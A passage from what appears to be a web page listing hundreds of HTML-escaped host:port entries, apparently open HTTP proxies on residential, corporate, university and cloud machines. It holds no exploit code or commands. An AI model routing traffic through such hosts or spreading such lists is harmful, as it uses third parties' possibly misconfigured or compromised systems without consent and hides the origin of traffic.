style="color: rgb(204, 51, 204);"&gt;89.72.44.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.141:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.241.76.142:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.213.137.94:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;chello087206030164.chello.pl:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;bkj-station3.jaring.my:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;fim203.internetdsl.tpnet.pl:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;host50-87-static.225-95-b.business.telecomitalia.it:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;server2.scav-media.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;www1.lflab.accessline.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;www2.efront.co.jp:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;www.rosecircle.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;www.demo.alcatel.it:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;static-193-13-33-219.cust.tele2.se:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;static-213-115-152-75.sme.bredbandsbolaget.se:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;spillover.com.ua:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;spazentral1-3.c.mad.interhost.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;saasapdb.hpintelco.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ks23804.kimsufi.com:8081&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;s69-163-32-201.in-addr.arpa.static.dsn1.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;qa1hs-thumb-pub.photoworks.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;pc-85-202-96-162.siedlce.domtel.com.pl:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;pu.kremenchug.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;mon75-5-82-226-30-116.fbx.proxad.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;mail2.p3b-sumatera.co.id:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;mail01.tuv-sud.jp:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;host19-79-static.89-94-b.business.telecomitalia.it:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ivk179.internetdsl.tpnet.pl:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;host162.200-43-12.telecom.net.ar:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;gs.sbras.ru:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;gre92-1-81-57-176-19.fbx.proxad.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;filter01.filternet.nl:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;cme-212-89-6-227.telecable.es:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;certowa.lawson.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;cardalytics.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;98.243.17.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;98.225.141.33:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;98.200.124.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;98.215.8.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;97.74.26.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;96.233.34.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;96.30.121.238:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.56.230.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.51.137.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.170.221.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.170.221.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.89.79.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.129.232.70:8081&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.159.64.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.40.10.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.62.160.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.236.39.1:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.199.42.144:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;94.155.46.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93-62-4-207.ip20.fastwebnet.it:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.186.167.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93-62-4-207.ip20.fastwebnet.it:9000&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.186.104.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.108.185.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.72.43.113:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.52.125.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.48.80.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.238.126.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.114.228.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.106.157.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.213.137.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.203.134.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.189.40.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.200.171.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.123.82.220:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.35.219:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.16.29:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.113.185.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.27.125.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.26.96.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.157.139.184:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.1.162.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.72.240.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.78.22.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.25.131.91:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.229.251.143:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.208.146.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.122:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.119:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.84.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.174.33.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.24.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.26.231:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.23.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.16.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.85.110.106:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.98.243.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.98.168.194:9090&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.191.39.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.191.227.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.198.23.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.46.8.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.9.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.253.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.46.8.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.8.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.253.72:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.233.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.219.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.237.184.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.241.44.40:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.231.249:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.8.214:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.8.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.46.9.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.199.92.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.26.209.84:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.12.243:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.148.21.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.163.18.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.114:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.203.50.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.31.143.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89-253-113-228.customers.ownit.se:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;90.27.127.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.121.17.71:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.188.104.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.203.136.191:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;91.205.123.92:808&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.239.203.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.150.190.194:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.185.87.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;93.63.71.211:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.129.232.106:8081&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.170.219.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.51.126.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;97.78.170.90:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;99.178.175.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;c-66-229-208-98.hsd1.fl.comcast.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ec2-79-125-74-168.eu-west-1.compute.amazonaws.com:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ip-62.111.178.74.static.crowley.pl:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;mail.imcolmedica.com.co:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;ns.letters-u-tokyo-ac.jp:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;proxy2.uws.ac.uk:9090&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;shogun.vm.bytemark.co.uk:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;u88ib4.bater.net.pl:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;superman.tca.net.id:8081&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;rinjani.mail2.p3b-sumatera.co.id:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;95.225.87.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;92.225.73.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.189.85.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.209.86.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;87.243.232.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.13.85.173:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.146.55.62:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.209.140.212:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.224.254.0:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.224.254.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.14.245.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.246.192.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;190.147.134.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.163:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;192.160.13.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.45:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.115.53.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.188.3.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.43.128.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.67.253.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.67.253.172:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.78.97.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208-96-213-149.static.cimcoisp.net:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.107.217.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.191.92.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.102.189:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.103.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.123.39.201:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.181.178.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.245.63.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.79.211.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.102.90.59:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.191.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.152.11.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.233.17.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.239.84.202:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.248.117.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.188.96.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;123.233.121.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.119.69.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.88.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.254.155.139:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.200.70.3:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.255.198.55:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.10.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.55.112.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;193.91.65.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.207.141.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.238.242.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.62.103.254:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.65.254.191:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.88.136.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.0.88.87:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.134.41.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.16.133.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.182.186.153:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.210.231.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.33.58.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.86.178.63:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.96.201.212:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.162.38.225:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.115:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.181:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.227:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.218.211.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.34.244.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.129.152.151:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.78.225.184:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.79.63.86:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.226.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.237.219:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.17.237.85:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.173.42.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.33.233.178:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.52.98.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.104.80.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.248.45.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.59.169.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.94.68.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.153.71.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.239.66.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.7.174.53:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.204:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.246:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.162.247:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.162.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.232:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.48:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.242:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.228:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.7.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.13.228:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.36:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.132.46.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.179.8.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.7.151.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.17.49:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.8.13:8000&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.165.189.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.172.88.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.142:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.161:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.173:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 